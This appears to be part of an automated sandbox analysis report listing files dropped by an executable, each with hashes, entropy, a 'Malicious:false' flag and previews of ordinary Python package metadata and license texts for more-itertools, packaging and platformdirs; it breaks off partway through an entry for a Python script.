                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: more-itertools.Version: 10.3.0.Summary: More routines for operating on iterables, beyond itertools.Keywords: itertools,iterator,iteration,filter,peek,peekable,chunk,chunked.Author-email: Erik Rose <erikrose@grinchcentral.com>.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Natural Language :: English.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: Implementation :: CPython.Classifier: Programming Language :: Python :: Implementation :: Py
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1259
                                                                                                                                                                                                                              Entropy (8bit):5.794423512787632
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:Bhxn/2zDahxvIhxphxBhxEsJXhxzvXiCflBJRHXoggtqgmf7WJhmsxmwG:hnuXwOph5J3zvXi4Lo7qgQ7WJhS
                                                                                                                                                                                                                              MD5:178EE325409DD28809AD3661E8819EF8
                                                                                                                                                                                                                              SHA1:F5844FAC6E3C9133FE5F1B8195EE801959801DF3
                                                                                                                                                                                                                              SHA-256:77C8E73E018DC0FD7E9ED6C80B05A4404545F641FB085220CE42B368B59AA3D3
                                                                                                                                                                                                                              SHA-512:2DB06B622F644674BF7D7AD8B780F9802858D15D73B5075139C2D82181DD6D589B90172BCA7AE9C785E705F447F523DB2AE641826C550C599551A7D8C2396FC2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:more_itertools-10.3.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..more_itertools-10.3.0.dist-info/LICENSE,sha256=CfHIyelBrz5YTVlkHqm4fYPAyw_QB-te85Gn4mQ8GkY,1053..more_itertools-10.3.0.dist-info/METADATA,sha256=BFO90O-fLNiVQMpj7oIS5ztzgJUUQZ3TA32P5HH3N-A,36293..more_itertools-10.3.0.dist-info/RECORD,,..more_itertools-10.3.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..more_itertools-10.3.0.dist-info/WHEEL,sha256=rSgq_JpHF9fHR1lx53qwg_1-2LypZE_qmcuXbVUq948,81..more_itertools/__init__.py,sha256=dtAbGjTDmn_ghiU5YXfhyDy0phAlXVdt5klZA5fUa-Q,149..more_itertools/__init__.pyi,sha256=5B3eTzON1BBuOLob1vCflyEb2lSd6usXQQ-Cv-hXkeA,43..more_itertools/__pycache__/__init__.cpython-312.pyc,,..more_itertools/__pycache__/more.cpython-312.pyc,,..more_itertools/__pycache__/recipes.cpython-312.pyc,,..more_itertools/more.py,sha256=1E5kzFncRKTDw0cYv1yRXMgDdunstLQd1QStcnL6U90,148370..more_itertools/more.pyi,sha256=iXXeqt48Nxe8VGmIWpkVXuKpR2FYNuu2DU8nQL
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):81
                                                                                                                                                                                                                              Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX/QFML6KjP+tPCCfA5I:Rt1QqL6gWBB3
                                                                                                                                                                                                                              MD5:FE76A5D309B5416824C2034FBF8A16CD
                                                                                                                                                                                                                              SHA1:5975EB6043863B0D018A5D751293F38E0B8E2874
                                                                                                                                                                                                                              SHA-256:AD282AFC9A4717D7C7475971E77AB083FD7ED8BCA9644FEA99CB976D552AF78F
                                                                                                                                                                                                                              SHA-512:6E4610171DD4E7E49FB4570CF3562D26A4F171FF67DA0F3A259A77916ACB939C8FCA7DA9F473EFAD839947796AC8CD7385DAA3264ADB150FF131A5C0FAC9329C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: flit 3.8.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):197
                                                                                                                                                                                                                              Entropy (8bit):4.510719529760597
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:hWDncJhByZmJgXPForADu1QjygQuaAJygT2d5GeWreBNA2eBKmJozlMHuO:h9Co8FyQjkDYc5tWreBN0n2mH1
                                                                                                                                                                                                                              MD5:FAADAEDCA9251A90B205C9167578CE91
                                                                                                                                                                                                                              SHA1:ED1FCABA1DBBF55113ABB419A484F3DF63E7ECFC
                                                                                                                                                                                                                              SHA-256:CAD1EF5BD340D73E074BA614D26F7DEACA5C7940C3D8C34852E65C4909686C48
                                                                                                                                                                                                                              SHA-512:1E69C89558FFE39E5C1EBB6728C4F0EB6023563C7A7F31B5417A8EFCC906378D2E2AF7B0E06A66980FBAAB7996AEB2AE1EA3918FDBE5FFCC3F77EA888A68EFBC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:This software is made available under the terms of *either* of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to this software is made.under the terms of *both* these licenses..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10174
                                                                                                                                                                                                                              Entropy (8bit):4.3908324771089084
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:nU6G5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLhP:U9vlKM1zJlFvmNz5VrZ
                                                                                                                                                                                                                              MD5:2EE41112A44FE7014DCE33E26468BA93
                                                                                                                                                                                                                              SHA1:598F87F072F66E2269DD6919292B2934DBB20492
                                                                                                                                                                                                                              SHA-256:0D542E0C8804E39AA7F37EB00DA5A762149DC682D7829451287E11B938E94594
                                                                                                                                                                                                                              SHA-512:27B8C0252EAE50CA3CE02AB7C5670664C0C824E03EB3DA1089F3F0A00D23E648A956BCB9F53645C6D79674A87C4CC86D1085DC335911BE0210D691336B121857
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1344
                                                                                                                                                                                                                              Entropy (8bit):5.070827944686827
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:fjUnoorbOFFTJJyRrYFTjz796432s4EOkUs8gROF32s3yTtTf413tf9fsZlTHv:fkOFJSrYJR6432svI32s3Stc13tfyTHv
                                                                                                                                                                                                                              MD5:7BEF9BF4A8E4263634D0597E7BA100B8
                                                                                                                                                                                                                              SHA1:FDC0E4EABC45522B079DEFF7D03D70528D775DC0
                                                                                                                                                                                                                              SHA-256:B70E7E9B742F1CC6F948B34C16AA39FFECE94196364BC88FF0D2180F0028FAC5
                                                                                                                                                                                                                              SHA-512:96C3273D51B83B6AE1AB85FEFB814DCD6C1E60D311D412242405AA429CC860412477CBD6ECE171408DBB85F0C4FD742E3AF20C758015BC48406AA65A1AB6F60A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Copyright (c) Donald Stufft and individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE.DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE.FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL.DAMAGES (INCLUDING, BUT NOT LIM
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3204
                                                                                                                                                                                                                              Entropy (8bit):4.9859857663557925
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:DRKnOkaMktjaVMxsxCp5QXFfFKiYEvA9TzBnyD:psZfFhgXNG
                                                                                                                                                                                                                              MD5:3236C0D7091D4A6577FA30E061480CEC
                                                                                                                                                                                                                              SHA1:F99865B8D3B90AD64A0060F7F2F4C6E4FAEB0A39
                                                                                                                                                                                                                              SHA-256:5F7A283B75A709FCCD481AEA42379F083D4F3801753365922E6B0732042515D9
                                                                                                                                                                                                                              SHA-512:A9F0BC43A135732510B98E9C0B7F997D9557A6069352372F1AC3216F0E66FA617D9597990904935D58E5139FB34E17995BFA8B95B90C71997206A2B6955FE867
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: packaging.Version: 24.1.Summary: Core utilities for Python packages.Author-email: Donald Stufft <donald@stufft.io>.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: License :: OSI Approved :: BSD License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Classifier: Programming Language :: Python :: 3.13.Classifier: Programming Language :: Python :: Implementation :: CPython.Classifier: Programming Language :: Python :: Implementation
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2565
                                                                                                                                                                                                                              Entropy (8bit):5.780503861671858
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:bsnuXksXW2Bsv8VsQ7lEsahOsbs5Jhsde8UogvtJkHpHAfEcysrD5WJeCzESowj:vXrW2s8JsMdVogvtJkJgfksP5qeCzOwj
                                                                                                                                                                                                                              MD5:88FBF3C6BD08040482212DAD5A8EAB02
                                                                                                                                                                                                                              SHA1:E7EE66942F7321FB77888D492D57C2EEEA1A5171
                                                                                                                                                                                                                              SHA-256:38A6898306293627C81E2B2D8A93E5F6857D5F7EDB73F0334E8D9A53DAD53B6E
                                                                                                                                                                                                                              SHA-512:786AE1F883A999A0939C22A756F90D74CC7F87AAF13F6FFF22D8D962D213A1ECBC6AAE2890A5D7347487824CD0E9EB440A3923F01F938EEF068719DFEEE96554
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:packaging-24.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..packaging-24.1.dist-info/LICENSE,sha256=ytHvW9NA1z4HS6YU0m996spceUDD2MNIUuZcSQlobEg,197..packaging-24.1.dist-info/LICENSE.APACHE,sha256=DVQuDIgE45qn836wDaWnYhSdxoLXgpRRKH4RuTjpRZQ,10174..packaging-24.1.dist-info/LICENSE.BSD,sha256=tw5-m3QvHMb5SLNMFqo5_-zpQZY2S8iP8NIYDwAo-sU,1344..packaging-24.1.dist-info/METADATA,sha256=X3ooO3WnCfzNSBrqQjefCD1POAF1M2WSLmsHMgQlFdk,3204..packaging-24.1.dist-info/RECORD,,..packaging-24.1.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..packaging-24.1.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..packaging/__init__.py,sha256=dtw2bNmWCQ9WnMoK3bk_elL1svSlikXtLpZhCFIB9SE,496..packaging/__pycache__/__init__.cpython-312.pyc,,..packaging/__pycache__/_elffile.cpython-312.pyc,,..packaging/__pycache__/_manylinux.cpython-312.pyc,,..packaging/__pycache__/_musllinux.cpython-312.pyc,,..packaging/__pycache__/_parser.cpython-312.pyc,,
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):81
                                                                                                                                                                                                                              Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
                                                                                                                                                                                                                              MD5:24019423EA7C0C2DF41C8272A3791E7B
                                                                                                                                                                                                                              SHA1:AAE9ECFB44813B68CA525BA7FA0D988615399C86
                                                                                                                                                                                                                              SHA-256:1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
                                                                                                                                                                                                                              SHA-512:09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11429
                                                                                                                                                                                                                              Entropy (8bit):5.039575520713946
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:n9x/tlCtlsaCUpVQ7yHwgNF8NFvWVDM1RnzadSibNTTh+fOnnxa6jlES4h8a8KAH:3/tlCfsqpq7ydZzM0dGiCbvHcjNj61TA
                                                                                                                                                                                                                              MD5:12306075DF09A0DBB93315FADDDF73FB
                                                                                                                                                                                                                              SHA1:1AC8A3679AFCFEEC0BA00851F5F8095DD1B060CD
                                                                                                                                                                                                                              SHA-256:CE6B227B4D46D4CB57474C2022FE57A557933BB89DAF4596BDF9B12AC296B869
                                                                                                                                                                                                                              SHA-512:BA0A72B888A14F82FD44FB103C01EF0900B5302F18E986A8264A9A08AB77D1C655C392374FD7B0A98BEF9B9511F6EC78AF3EF8936091C80A0B5364F7A53DC20A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.3.Name: platformdirs.Version: 4.2.2.Summary: A small Python package for determining appropriate platform-specific dirs, e.g. a `user data dir`..Project-URL: Documentation, https://platformdirs.readthedocs.io.Project-URL: Homepage, https://github.com/platformdirs/platformdirs.Project-URL: Source, https://github.com/platformdirs/platformdirs.Project-URL: Tracker, https://github.com/platformdirs/platformdirs/issues.Maintainer-email: Bern.t G.bor <gaborjbernat@gmail.com>, Julian Berman <Julian@GrayVines.com>, Ofek Lev <oss@ofek.dev>, Ronny Pfannschmidt <opensource@ronnypfannschmidt.de>.License-Expression: MIT.License-File: LICENSE.Keywords: appdirs,application,cache,directory,log,user.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Operating System :: OS Independent.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1642
                                                                                                                                                                                                                              Entropy (8bit):5.780720255872038
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:bn/2zDzoobEsJhfPWcs013+pj456szN6lnhta57WJ+guQg4:bnuXcob5Jhfucs+d49hta9WJ+g1X
                                                                                                                                                                                                                              MD5:0E141A28570FC62974FC5CEADFE808E3
                                                                                                                                                                                                                              SHA1:7B92561C5BBBA83D6E16A1C7B195089ACA1766AF
                                                                                                                                                                                                                              SHA-256:4C211D76D42ED40EFC3ACFCC866D8912A718AFBCA2B7E51849442366D6E99FE8
                                                                                                                                                                                                                              SHA-512:830721C18A35AECD1EFB81A5FAAF8AC0EA02428EDC5B294458556343788D894B76035F1E661214D975DF2A64DC8C3D6AAA7A53A99BE64B9413B6A5D89D549F9D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:platformdirs-4.2.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..platformdirs-4.2.2.dist-info/METADATA,sha256=zmsie01G1MtXR0wgIv5XpVeTO7idr0WWvfmxKsKWuGk,11429..platformdirs-4.2.2.dist-info/RECORD,,..platformdirs-4.2.2.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..platformdirs-4.2.2.dist-info/WHEEL,sha256=zEMcRr9Kr03x1ozGwg5v9NQBKn3kndp6LSoSlVg-jhU,87..platformdirs-4.2.2.dist-info/licenses/LICENSE,sha256=KeD9YukphQ6G6yjD_czwzv30-pSHkBHP-z0NS-1tTbY,1089..platformdirs/__init__.py,sha256=EMGE8qeHRR9CzDFr8kL3tA8hdZZniYjXBVZd0UGTWK0,22225..platformdirs/__main__.py,sha256=HnsUQHpiBaiTxwcmwVw-nFaPdVNZtQIdi1eWDtI-MzI,1493..platformdirs/__pycache__/__init__.cpython-312.pyc,,..platformdirs/__pycache__/__main__.cpython-312.pyc,,..platformdirs/__pycache__/android.cpython-312.pyc,,..platformdirs/__pycache__/api.cpython-312.pyc,,..platformdirs/__pycache__/macos.cpython-312.pyc,,..platformdirs/__pycache__/unix.cpython-312.pyc,,..platformdirs/__p
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):87
                                                                                                                                                                                                                              Entropy (8bit):4.730668933656452
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeXAaCTR73RP+tPCCfA5I:Rt2PFRWBB3
                                                                                                                                                                                                                              MD5:8895639B8515B3094302B59E28AFB562
                                                                                                                                                                                                                              SHA1:FBD4DA759EA5BEB65AE820DFBC47F9B569E89519
                                                                                                                                                                                                                              SHA-256:CC431C46BF4AAF4DF1D68CC6C20E6FF4D4012A7DE49DDA7A2D2A1295583E8E15
                                                                                                                                                                                                                              SHA-512:B53C0978DAD2A7195058ABC7B7D20A229EC617BDDBB364D8ED2354F37D5071208735774350F9FBBA5C804BEFCEFE71C27BC5E468E12899DF4687189C468785A0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: hatchling 1.24.2.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1089
                                                                                                                                                                                                                              Entropy (8bit):5.119723466133474
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:VrmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:VaJHlxE3dQHOs5exm3ogFh
                                                                                                                                                                                                                              MD5:EA4F5A41454746A9ED111E3D8723D17A
                                                                                                                                                                                                                              SHA1:F511A8A63AF8C6E36004B593478436BBC560EE0C
                                                                                                                                                                                                                              SHA-256:29E0FD62E929850E86EB28C3FDCCF0CEFDF4FA94879011CFFB3D0D4BED6D4DB6
                                                                                                                                                                                                                              SHA-512:CACA68A5589CA2EAB7C0D74BA5D2B25E3367B9902DFC7578BBA911AC8F8BF1C3A13F25E663C5B6B19BA71BF611943E23F4D0A99BE92A8F7D7FF60732DC3DD409
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MIT License..Copyright (c) 2010-202x The platformdirs developers..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1072
                                                                                                                                                                                                                              Entropy (8bit):5.10135495500641
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:f9rmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:1aJHlxE3dQHOs5exm3ogFh
                                                                                                                                                                                                                              MD5:AAAAF0879D17DF0110D1AA8C8C9F46F5
                                                                                                                                                                                                                              SHA1:9DA6CA26337A886FB3E8D30EFD4AEDA623DC9ADE
                                                                                                                                                                                                                              SHA-256:B80816B0D530B8ACCB4C2211783790984A6E3B61922C2B5EE92F3372AB2742FE
                                                                                                                                                                                                                              SHA-512:EECD0C29FEBF51ADEFB02F970E66EFE7E24D573686DFDB3BEEA63CEFEA012A79CE3C49A899B4F26E9B67DC27176B397F6041909227281F9866BEEDC97389095C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MIT License..Copyright (c) 2021 Taneli Hukkinen..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CON
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8875
                                                                                                                                                                                                                              Entropy (8bit):4.884349533695185
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:h15VsahrDzoGlmLxUJyLIPXR/yrKK3Trclclg2pj4VRR6V8wNVonQd:3swrAamWuIPA2K3v2g
